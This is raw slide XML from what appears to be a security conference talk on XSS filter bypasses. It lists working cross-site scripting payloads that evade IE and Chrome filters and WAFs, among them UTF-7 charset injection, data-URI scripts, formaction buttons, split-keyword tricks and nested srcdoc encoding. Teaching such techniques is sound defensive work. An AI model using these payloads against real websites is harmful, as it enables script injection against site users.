              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)%2b“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alt=""&gt;&lt;script/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)+"" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="123" /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; y = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; &lt;/script&gt;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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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IE vulnerable to meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection (now patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=utf-7&gt;+ADw-script+AD4-alert(1)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-/script+AD4-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rules didn’t account for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allowed injection of UTF-7 or other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charsets</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE blocked anchor based injections </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> looks like &lt;a.*?hr{e}f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Could be bypassed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> now patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type=hidden name=x value=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&gt;&lt;button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=xss2.php style=width:100%;height:100%;font-size:55pt;position:absolute&gt;PWND&lt;/button&gt;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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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There is a generic method to bypass both IE/Chrome XSS filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Site filters a character such as “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can inject the character to bypass the filter by hiding the keywords searched for by the filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sty”le</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(alert(1)) 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Horror FILMS ARE LIKE SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="-2259632"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="zombie.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="2535706"/>
            <a:ext cx="6034617" cy="4322294"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648"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bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>They both have zombies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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS auditor is easier to bypass and once a character is filtered (removed) you can bypass most checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE is clever in some instances and can detect if characters like &lt;&gt; are removed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Still can be bypassed using quotes in script based injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other characters can easily bypass the filter where keywords such as style are used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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Site filters “(“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1) bypasses IE XSS filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Site filters “;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on;error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&gt; bypasses XSS auditor and IE XSS filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Site filters “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘,alert(“1),’ bypasses IE XSS filter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General XSS techniques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a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5069160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is awesome for bypassing WAF’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple levels of encoding can bypass filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amp;lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amp;gt;'&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
